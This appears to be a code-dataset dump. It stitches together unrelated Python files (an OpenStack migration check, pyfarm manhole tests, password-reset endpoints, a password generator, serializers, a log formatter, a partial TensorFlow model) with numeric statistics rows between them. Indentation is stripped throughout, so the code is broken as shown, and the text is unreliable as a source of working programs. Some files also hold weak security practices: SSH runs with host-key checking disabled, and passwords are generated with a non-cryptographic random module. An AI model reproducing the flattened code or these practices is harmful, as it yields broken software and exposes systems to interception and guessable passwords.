# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import getpass
import logging
from cloudferry.lib.base import exception
from cloudferry.lib.base.action import action
from cloudferry.lib.utils import local
from cloudferry.lib.utils import remote_runner
LOG = logging.getLogger(__name__)
class CheckVMAXPrerequisites(action.Action):
"""This verifies prerequisites required for NFS to VMAX iSCSI cinder
volume migration"""
def _iscsiadm_is_installed_locally(self):
LOG.info("Checking if iscsiadm tool is installed")
try:
local.run('iscsiadm --help &>/dev/null')
except local.LocalExecutionFailed:
msg = ("iscsiadm is not available on the local host. Please "
"install iscsiadm tool on the node you running on or "
"choose other cinder backend for migration. iscsiadm is "
"mandatory for migrations with EMC VMAX cinder backend")
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _check_local_sudo_password_set(self):
current_user = getpass.getuser()
if current_user != 'root' and \
self.cfg.migrate.local_sudo_password is None:
try:
local.sudo('ls')
except local.LocalExecutionFailed:
msg = ("CloudFerry is running as '{user}' user, but "
"passwordless sudo does not seem to be configured on "
"current host. Please either specify password in "
"`local_sudo_password` config option, or run "
"CloudFerry as root user.").format(user=current_user)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def _ssh_connectivity_between_controllers(self):
src_host = self.cfg.src.ssh_host
src_user = self.cfg.src.ssh_user
dst_host = self.cfg.dst.ssh_host
dst_user = self.cfg.dst.ssh_user
LOG.info("Checking ssh connectivity between '%s' and '%s'",
src_host, dst_host)
rr = remote_runner.RemoteRunner(src_host, src_user)
ssh_opts = ('-o UserKnownHostsFile=/dev/null '
'-o StrictHostKeyChecking=no')
cmd = "ssh {opts} {user}@{host} 'echo ok'".format(opts=ssh_opts,
user=dst_user,
host=dst_host)
try:
rr.run(cmd)
except remote_runner.RemoteExecutionError:
msg = ("No ssh connectivity between source host '{src_host}' and "
"destination host '{dst_host}'. Make sure you have keys "
"and correct configuration on these nodes. To verify run "
"'{ssh_cmd}' from '{src_host}' node")
msg = msg.format(src_host=src_host, dst_host=dst_host, ssh_cmd=cmd)
LOG.error(msg)
raise exception.AbortMigrationError(msg)
def run(self, **kwargs):
if self.cfg.dst_storage.backend != 'iscsi-vmax':
return
self._iscsiadm_is_installed_locally()
self._ssh_connectivity_between_controllers()
self._check_local_sudo_password_set()
| 41.347826
| 79
| 0.624869
| 457
| 3,804
| 5.056893
| 0.380744
| 0.021203
| 0.023799
| 0.02077
| 0.168758
| 0.064907
| 0.064907
| 0.064907
| 0
| 0
| 0
| 0.002985
| 0.295478
| 3,804
| 91
| 80
| 41.802198
| 0.859328
| 0.166404
| 0
| 0.177419
| 0
| 0
| 0.268974
| 0.023182
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064516
| false
| 0.129032
| 0.096774
| 0
| 0.193548
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ab8849571d80e31e545baaa8fc3a7e45faa001
| 6,176
|
py
|
Python
|
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
tests/test_agent/test_manhole.py
|
guidow/pyfarm-agent
|
bb5d464f9f6549a3db3529a93e3d9f388b365586
|
[
"Apache-2.0"
] | null | null | null |
# No shebang line, this module is meant to be imported
#
# Copyright 2014 Oliver Palmer
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from collections import namedtuple
from pprint import pprint
from random import randint
from StringIO import StringIO
from textwrap import dedent
try:
from unittest.mock import patch
except ImportError: # pragma: no cover
from mock import patch
from twisted.internet.protocol import ServerFactory
from twisted.cred.portal import Portal
from twisted.conch.telnet import (
ITelnetProtocol, TelnetBootstrapProtocol, TelnetTransport)
from pyfarm.agent.testutil import TestCase
from pyfarm.agent.manhole import (
LoggingManhole, TransportProtocolFactory, TelnetRealm,
manhole_factory, show)
Peer = namedtuple("Peer", ("host", "port"))
class FakeLoggingManhole(LoggingManhole):
QUIT = False
GET_PEER_CALLS = 0
class terminal(object):
RIGHT_ARROW, LEFT_ARROW = None, None
class transport(object):
@classmethod
def getPeer(cls):
FakeLoggingManhole.GET_PEER_CALLS += 1
return Peer(os.urandom(12).encode("hex"), randint(1024, 65535))
def handle_QUIT(self):
self.QUIT = True
class TestManholeBase(TestCase):
def setUp(self):
TelnetRealm.NAMESPACE = None
FakeLoggingManhole.GET_PEER_CALLS = 0
FakeLoggingManhole.QUIT = False
class TestManholeFactory(TestManholeBase):
def test_assertions(self):
with self.assertRaises(AssertionError):
manhole_factory(None, "", "")
with self.assertRaises(AssertionError):
manhole_factory({}, None, "")
with self.assertRaises(AssertionError):
manhole_factory({}, "", None)
def test_instance_one(self):
namespace = {"bob": None}
username = os.urandom(32).encode("hex")
password = os.urandom(32).encode("hex")
manhole_factory(namespace, username, password)
with self.assertRaises(AssertionError):
manhole_factory(namespace, username, password)
def test_instance(self):
namespace = {"bob": None}
username = os.urandom(32).encode("hex")
password = os.urandom(32).encode("hex")
manhole = manhole_factory(namespace, username, password)
self.assertEqual(namespace, {"bob": None})
self.assertEqual(
TelnetRealm.NAMESPACE,
{"bob": None, "pp": pprint, "show": show})
self.assertIsInstance(manhole, ServerFactory)
self.assertIsInstance(manhole.protocol, TransportProtocolFactory)
self.assertIsInstance(manhole.protocol.portal, Portal)
# There could be multiple password checkers, check for the one
# we know we should have added.
for _, instance in manhole.protocol.portal.checkers.items():
found = False
for user, passwd in instance.users.items():
if user == username and passwd == password:
found = True
if found:
break
else:
self.fail("Failed to find correct username and password.")
def test_request_avatar(self):
realm = TelnetRealm()
avatar = realm.requestAvatar(None, ITelnetProtocol)
self.assertEqual(len(avatar), 3)
self.assertIs(avatar[0], ITelnetProtocol)
self.assertIsInstance(avatar[1], TelnetBootstrapProtocol)
self.assertTrue(callable(avatar[2]))
def test_request_avatar_error(self):
realm = TelnetRealm()
with self.assertRaises(NotImplementedError):
realm.requestAvatar(None, None)
def test_protocol_factory(self):
factory = TransportProtocolFactory(None)
transport = factory()
self.assertIsInstance(transport, TelnetTransport)
class TestManholeShow(TestManholeBase):
def test_uses_namespace(self):
namespace = {"bob": None}
username = os.urandom(32).encode("hex")
password = os.urandom(32).encode("hex")
manhole_factory(namespace, username, password)
output = StringIO()
with patch("sys.stdout", output):
show()
output.seek(0)
output = output.getvalue().strip()
self.assertEqual(output, "objects: ['bob', 'pp', 'show']")
def test_custom_object(self):
class Foobar(object):
a, b, c, d, e = True, 1, "yes", {}, 0.0
output = StringIO()
with patch("sys.stdout", output):
show(Foobar)
output.seek(0)
output = output.getvalue().strip()
self.assertEqual(
output,
dedent("""
data attributes of <class 'tests.test_agent.test_manhole.Foobar'>
a : True
b : 1
c : yes
d : {} (0 elements)
e : 0.0
""").strip())
def test_wrap_long_line(self):
class Foobar(object):
a = " " * 90
output = StringIO()
with patch("sys.stdout", output):
show(Foobar)
output.seek(0)
output = output.getvalue().strip()
self.assertEqual(
output,
dedent("""
data attributes of <class 'tests.test_agent.test_manhole.Foobar'>
a : ' """ +
""" '...
""").strip())
class TestLoggingManhole(TestManholeBase):
def test_line_received(self):
f = FakeLoggingManhole()
f.lineReceived("exit")
self.assertTrue(f.QUIT)
| 32.505263
| 79
| 0.615771
| 647
| 6,176
| 5.812983
| 0.33694
| 0.018612
| 0.017549
| 0.02712
| 0.279713
| 0.250997
| 0.238235
| 0.238235
| 0.227067
| 0.227067
| 0
| 0.011322
| 0.284974
| 6,176
| 189
| 80
| 32.677249
| 0.840353
| 0.114475
| 0
| 0.316176
| 0
| 0
| 0.106221
| 0.014485
| 0
| 0
| 0
| 0
| 0.147059
| 1
| 0.095588
| false
| 0.073529
| 0.102941
| 0
| 0.286765
| 0.014706
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ae868b0b9598e5f2e99607cce26d99b3a34dc3
| 4,147
|
py
|
Python
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 2
|
2020-10-19T08:59:08.000Z
|
2022-03-07T10:30:21.000Z
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 67
|
2020-04-15T09:43:31.000Z
|
2022-03-18T08:29:17.000Z
|
vantage6/server/resource/recover.py
|
jaspersnel/vantage6-server
|
88ad40d23cc36eaba57c170929f7ccdd0011720a
|
[
"Apache-2.0"
] | 2
|
2021-01-21T15:09:26.000Z
|
2021-04-19T14:58:10.000Z
|
# -*- coding: utf-8 -*-
import logging
import datetime
from flask import request, render_template
from flask_jwt_extended import (
create_access_token,
decode_token
)
from jwt.exceptions import DecodeError
from flasgger import swag_from
from http import HTTPStatus
from pathlib import Path
from sqlalchemy.orm.exc import NoResultFound
from vantage6.common import logger_name
from vantage6.server import db
from vantage6.server.resource import (
ServicesResources
)
module_name = logger_name(__name__)
log = logging.getLogger(module_name)
def setup(api, api_base, services):
path = "/".join([api_base, module_name])
log.info(f'Setting up "{path}" and subdirectories')
api.add_resource(
ResetPassword,
path+'/reset',
endpoint="reset_password",
methods=('POST',),
resource_class_kwargs=services
)
api.add_resource(
RecoverPassword,
path+'/lost',
endpoint='recover_password',
methods=('POST',),
resource_class_kwargs=services
)
# ------------------------------------------------------------------------------
# Resources / API's
# ------------------------------------------------------------------------------
class ResetPassword(ServicesResources):
"""user can use recover token to reset their password."""
@swag_from(str(Path(r"swagger/post_reset_password.yaml")),
endpoint='reset_password')
def post(self):
""""submit email-adress receive token."""
# retrieve user based on email or username
body = request.get_json()
reset_token = body.get("reset_token")
password = body.get("password")
if not reset_token or not password:
return {"msg": "reset token and/or password is missing!"}, \
HTTPStatus.BAD_REQUEST
# obtain user
try:
user_id = decode_token(reset_token)['identity'].get('id')
except DecodeError:
return {"msg": "Invalid recovery token!"}, HTTPStatus.BAD_REQUEST
log.debug(user_id)
user = db.User.get(user_id)
# set password
user.set_password(password)
user.save()
log.info(f"Successfull password reset for '{user.username}'")
return {"msg": "password successfully been reset!"}, \
HTTPStatus.OK
class RecoverPassword(ServicesResources):
"""send a mail containing a recover token"""
@swag_from(str(Path(r"swagger/post_recover_password.yaml")),
endpoint='recover_password')
def post(self):
"""username or email generates a token which is mailed."""
# default return string
ret = {"msg": "If the username or email is our database you "
"will soon receive an email"}
# obtain username/email from request'
body = request.get_json()
username = body.get("username")
email = body.get("email")
if not (email or username):
return {"msg": "No username or email provided!"}, \
HTTPStatus.BAD_REQUEST
# find user in the database, if not here we stop!
try:
if username:
user = db.User.get_by_username(username)
else:
user = db.User.get_by_email(email)
except NoResultFound:
# we do not tell them.... But we won't continue either
return ret
log.info(f"Password reset requested for '{user.username}'")
# generate a token that can reset their password
expires = datetime.timedelta(hours=1)
reset_token = create_access_token(
{"id": str(user.id)}, expires_delta=expires
)
self.mail.send_email(
"password reset",
sender="support@vantage6.ai",
recipients=[user.email],
text_body=render_template("mail/reset_password_token.txt",
token=reset_token),
html_body=render_template("mail/reset_password_token.html",
token=reset_token)
)
return ret
| 30.718519
| 80
| 0.590306
| 459
| 4,147
| 5.187364
| 0.346405
| 0.033599
| 0.01008
| 0.01638
| 0.107518
| 0.094918
| 0.094918
| 0
| 0
| 0
| 0
| 0.002001
| 0.276827
| 4,147
| 134
| 81
| 30.947761
| 0.791931
| 0.15674
| 0
| 0.175824
| 0
| 0
| 0.180375
| 0.036075
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032967
| false
| 0.21978
| 0.131868
| 0
| 0.252747
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86d39cbeb38ed832359d8101e1462aeccc15eee8
| 1,400
|
py
|
Python
|
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | 1
|
2018-04-25T08:08:47.000Z
|
2018-04-25T08:08:47.000Z
|
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | null | null | null |
src/knownnodes.py
|
skeevey/PyBitmessage
|
196d688b138393d1d540df3322844dfe7e7c02ba
|
[
"MIT"
] | 1
|
2018-04-25T08:08:48.000Z
|
2018-04-25T08:08:48.000Z
|
import pickle
import threading
from bmconfigparser import BMConfigParser
import state
knownNodesLock = threading.Lock()
knownNodes = {}
knownNodesTrimAmount = 2000
def saveKnownNodes(dirName = None):
if dirName is None:
dirName = state.appdata
with knownNodesLock:
with open(dirName + 'knownnodes.dat', 'wb') as output:
pickle.dump(knownNodes, output)
def increaseRating(peer):
increaseAmount = 0.1
maxRating = 1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = min(knownNodes[stream][peer]["rating"] + increaseAmount, maxRating)
except KeyError:
pass
def decreaseRating(peer):
decreaseAmount = 0.1
minRating = -1
with knownNodesLock:
for stream in knownNodes.keys():
try:
knownNodes[stream][peer]["rating"] = max(knownNodes[stream][peer]["rating"] - decreaseAmount, minRating)
except KeyError:
pass
def trimKnownNodes(recAddrStream = 1):
if len(knownNodes[recAddrStream]) < BMConfigParser().get("knownnodes", "maxnodes"):
return
with knownNodesLock:
oldestList = sorted(knownNodes[recAddrStream], key=lambda x: x['lastseen'])[:knownNodesTrimAmount]
for oldest in oldestList:
del knownNodes[recAddrStream][oldest]
| 30.434783
| 120
| 0.648571
| 134
| 1,400
| 6.776119
| 0.440299
| 0.079295
| 0.088106
| 0.114537
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0.160793
| 0
| 0.010496
| 0.251429
| 1,400
| 45
| 121
| 31.111111
| 0.855916
| 0
| 0
| 0.315789
| 0
| 0
| 0.047143
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0.052632
| 0.105263
| 0
| 0.236842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
86ef4e909fe2cea39d77e8fe80f71f1e8cdcd676
| 1,844
|
py
|
Python
|
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | 3
|
2021-07-19T16:39:06.000Z
|
2021-11-08T11:53:50.000Z
|
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | null | null | null |
main.py
|
Light-Lens/PassGen
|
8f4f2ef08299d6243b939d0f08ac75bde3cabf5e
|
[
"MIT"
] | null | null | null |
# PassGen
# These imports will be used for this project.
from colorama import Fore, Style
from colorama import init
import datetime
import string
import random
import sys
import os
# Initilaze File organizer.
os.system('title PassGen')
init(autoreset = True)
# Create Log Functions.
class LOG:
def INFO_LOG(message):
CurrentTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(f"{CurrentTime} - INFO: {message}")
def STATUS_LOG(message):
CurrentTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(f"{CurrentTime} - STATUS: {message}")
def ERROR_LOG(message):
CurrentTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(Fore.RED + Style.BRIGHT + f"{CurrentTime} - ERROR: {message}")
def WARN_LOG(message):
CurrentTime = datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')
print(Fore.YELLOW + Style.BRIGHT + f"{CurrentTime} - WARNING: {message}")
# This will Generate a Strong Password for the User!
def Generate(PassLen):
JoinChars = [] # Create an Empty List.
# Split the List of these String Operations, and Join them to JoinChars List.
JoinChars.extend(list(string.ascii_letters))
JoinChars.extend(list(string.digits))
JoinChars.extend(list(string.punctuation))
random.shuffle(JoinChars) # Shuffle the List.
# Get the random passoword.
return "".join(JoinChars[0:PassLen])
# Code Logic here.
LOG.WARN_LOG("Initialized PassGen!")
LOG.STATUS_LOG("Generating a Random Password for You.")
Password = Generate(random.randint(5, 17))
LOG.INFO_LOG(f"Your Password is: {Password}")
with open("Password.log", "a") as File: File.write(f"{Password}\n")
if (len(sys.argv) == 1) or (len(sys.argv) > 1 and sys.argv[1].lower() != "-o"):
os.system("start Password.log")
sys.exit() # Exiting the program successfully.
| 32.350877
| 80
| 0.691432
| 262
| 1,844
| 4.835878
| 0.408397
| 0.031571
| 0.066298
| 0.091555
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0.211523
| 0
| 0.004487
| 0.154013
| 1,844
| 56
| 81
| 32.928571
| 0.807692
| 0.186551
| 0
| 0.108108
| 0
| 0
| 0.238128
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.135135
| false
| 0.243243
| 0.189189
| 0
| 0.378378
| 0.108108
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
810e3e3e48092c408dee59bf8a6eb974e84689eb
| 1,475
|
py
|
Python
|
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
Final-Project/server/art/serializers.py
|
wendy006/Web-Dev-Course
|
2f0cfddb7ab4db88ffb4483c7cd4a00abf36c720
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
from .models import *
class CollectionSerializer(serializers.ModelSerializer):
class Meta:
model = Collection
fields = ('collectionID', 'name', 'display_name', 'description', 'img_url')
class ArtSerializer(serializers.ModelSerializer):
img_url = serializers.ReadOnlyField()
thumb_url = serializers.ReadOnlyField()
class Meta:
model = Art
fields = ('artID', 'title', 'filename', 'rarity', 'collection', 'img_url', 'thumb_url')
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = User
fields = ('id', 'username', 'email', 'password', 'coins', 'art')
extra_kwargs = {
'password': {'write_only': True}
}
def create(self, validated_data):
password = validated_data.pop('password', None)
instance = self.Meta.model(**validated_data)
if password is not None:
instance.set_password(password)
instance.save()
return instance
class OwnSerializer(serializers.ModelSerializer):
duplicates = serializers.ReadOnlyField()
class Meta:
model = Own
fields = ('ownID', 'user', 'art', 'duplicates')
class SaleSerializer(serializers.ModelSerializer):
class Meta:
model = Sale
fields = ('saleID', 'seller', 'buyer', 'ownership', 'art', 'price', 'available', 'sold', 'postDate', 'purchaseDate')
| 35.97561
| 124
| 0.626441
| 136
| 1,475
| 6.698529
| 0.5
| 0.059276
| 0.076839
| 0.115258
| 0.215148
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.247458
| 1,475
| 41
| 124
| 35.97561
| 0.820721
| 0
| 0
| 0.142857
| 0
| 0
| 0.168524
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028571
| false
| 0.142857
| 0.057143
| 0
| 0.485714
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
d4cd43090d9af44b579f4587a49e6d83acfe093a
| 807
|
py
|
Python
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 1
|
2020-04-16T17:09:15.000Z
|
2020-04-16T17:09:15.000Z
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 35
|
2019-11-06T17:06:16.000Z
|
2021-04-12T16:27:20.000Z
|
src/dataclay/util/logs.py
|
kpavel/pyclay
|
275bc8af5c57301231a20cca1cc88556a9c84c79
|
[
"BSD-3-Clause"
] | 1
|
2020-05-06T11:28:16.000Z
|
2020-05-06T11:28:16.000Z
|
""" Class description goes here. """
import json
import logging
class JSONFormatter(logging.Formatter):
"""Simple JSON formatter for the logging facility."""
def format(self, obj):
"""Note that obj is a LogRecord instance."""
# Copy the dictionary
ret = dict(obj.__dict__)
# Perform the message substitution
args = ret.pop("args")
msg = ret.pop("msg")
ret["message"] = msg % args
# Exceptions must be formatted (they are not JSON-serializable
try:
ei = ret.pop("exc_info")
except KeyError:
pass
else:
if ei is not None:
ret["exc_info"] = self.formatException(ei)
# Dump the dictionary in JSON form
return json.dumps(ret, skipkeys=True)
| 26.032258
| 70
| 0.581165
| 95
| 807
| 4.873684
| 0.621053
| 0.038877
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.319703
| 807
| 30
| 71
| 26.9
| 0.843352
| 0.327138
| 0
| 0
| 0
| 0
| 0.057471
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0.0625
| 0.125
| 0
| 0.3125
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
be2a32ef4dd37c381a36c7a58f2812962caeb4d5
| 502
|
py
|
Python
|
logger_application/logger.py
|
swatishayna/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | 1
|
2022-03-24T20:26:44.000Z
|
2022-03-24T20:26:44.000Z
|
logger_application/logger.py
|
surajaiswal13/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | null | null | null |
logger_application/logger.py
|
surajaiswal13/OnlineEDAAutomation
|
a1bfe8b1dee51a4872529a98f6e1136922329e3e
|
[
"MIT"
] | 2
|
2022-02-08T16:35:32.000Z
|
2022-03-04T06:56:54.000Z
|
from datetime import datetime
from src.utils import uploaded_file
import os
class App_Logger:
def __init__(self):
pass
def log(self, file_object, email, log_message, log_writer_id):
self.now = datetime.now()
self.date = self.now.date()
self.current_time = self.now.strftime("%H:%M:%S")
file_object.write(
email+ "_eda_" + log_writer_id + "\t\t" +str(self.date) + "/" + str(self.current_time) + "\t\t" +email+ "\t\t" +log_message +"\n")
| 27.888889
| 143
| 0.621514
| 73
| 502
| 4.027397
| 0.465753
| 0.071429
| 0.07483
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.227092
| 502
| 17
| 144
| 29.529412
| 0.757732
| 0
| 0
| 0
| 0
| 0
| 0.055888
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.083333
| 0.25
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0773947b769d5f943efc051b2beaf2ee562da724
| 1,231
|
py
|
Python
|
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
AppImageBuilder/commands/file.py
|
gouchi/appimage-builder
|
40e9851c573179e066af116fb906e9cad8099b59
|
[
"MIT"
] | null | null | null |
# Copyright 2020 Alexis Lopez Zubieta
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or
# sell copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
import os
from .command import Command
class FileError(RuntimeError):
pass
class File(Command):
def __init__(self):
super().__init__('file')
self.log_stdout = False
self.log_command = False
def query(self, path):
self._run(['file', '-b', '--exclude', 'ascii', path])
if self.return_code != 0:
raise FileError('\n'.join(self.stderr))
return '\n'.join(self.stdout)
def is_executable_elf(self, path):
output = self.query(path)
result = ('ELF' in output) and ('executable' in output)
return result
| 31.564103
| 80
| 0.685621
| 166
| 1,231
| 5
| 0.554217
| 0.066265
| 0.031325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005225
| 0.222583
| 1,231
| 38
| 81
| 32.394737
| 0.862069
| 0.490658
| 0
| 0
| 0
| 0
| 0.066775
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0.055556
| 0.111111
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
07abdc1f2ef1ad7ab554d9cccaa9f73782091369
| 6,609
|
py
|
Python
|
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-13T21:48:52.000Z
|
2022-03-13T21:48:52.000Z
|
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | null | null | null |
low_rank_local_connectivity/models/simple_model.py
|
shaun95/google-research
|
d41bbaca1eb9bfd980ec2b3fd201c3ddb4d1f2e5
|
[
"Apache-2.0"
] | 1
|
2022-03-30T07:20:29.000Z
|
2022-03-30T07:20:29.000Z
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Simple model for image classification.
The model is multiple
conv/locally_connected/wide_conv/low_rank_locally_connected layers followed
by a fully connected layer. Changes to the model architecture can be made by
modifying simple_model_config.py file.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import tensorflow.compat.v1 as tf
from low_rank_local_connectivity import layers
from low_rank_local_connectivity import utils
MOMENTUM = 0.9
EPS = 1e-5
class SimpleNetwork(tf.keras.Model):
"""Locally Connected Network."""
def __init__(self, config, variable_scope='simple_network'):
super(SimpleNetwork, self).__init__()
self.variable_scope = variable_scope
self.config = copy.deepcopy(config)
filters_list = self.config.num_filters_list
depth = len(filters_list)
self.pass_is_training_list = []
self.layers_list = []
if self.config.num_channels < 1:
raise ValueError('num_channels should be > 0')
input_channels = self.config.num_channels
if self.config.coord_conv:
# Add two coordinate conv channels.
input_channels = input_channels + 2
if len(self.config.layer_types) < depth:
self.config.layer_types.extend(
['conv2d'] * (depth - len(self.config.layer_types)))
chin = input_channels
for i, (kernel_size, num_filters, strides, layer_type) in enumerate(zip(
self.config.kernel_size_list,
filters_list,
self.config.strides_list,
self.config.layer_types)):
padding = 'valid'
if layer_type == 'conv2d':
chout = num_filters
layer = tf.keras.layers.Conv2D(
filters=chout,
kernel_size=kernel_size,
strides=(strides, strides),
padding=padding,
activation=None,
use_bias=not self.config.batch_norm,
kernel_initializer=self.config.kernel_initializer,
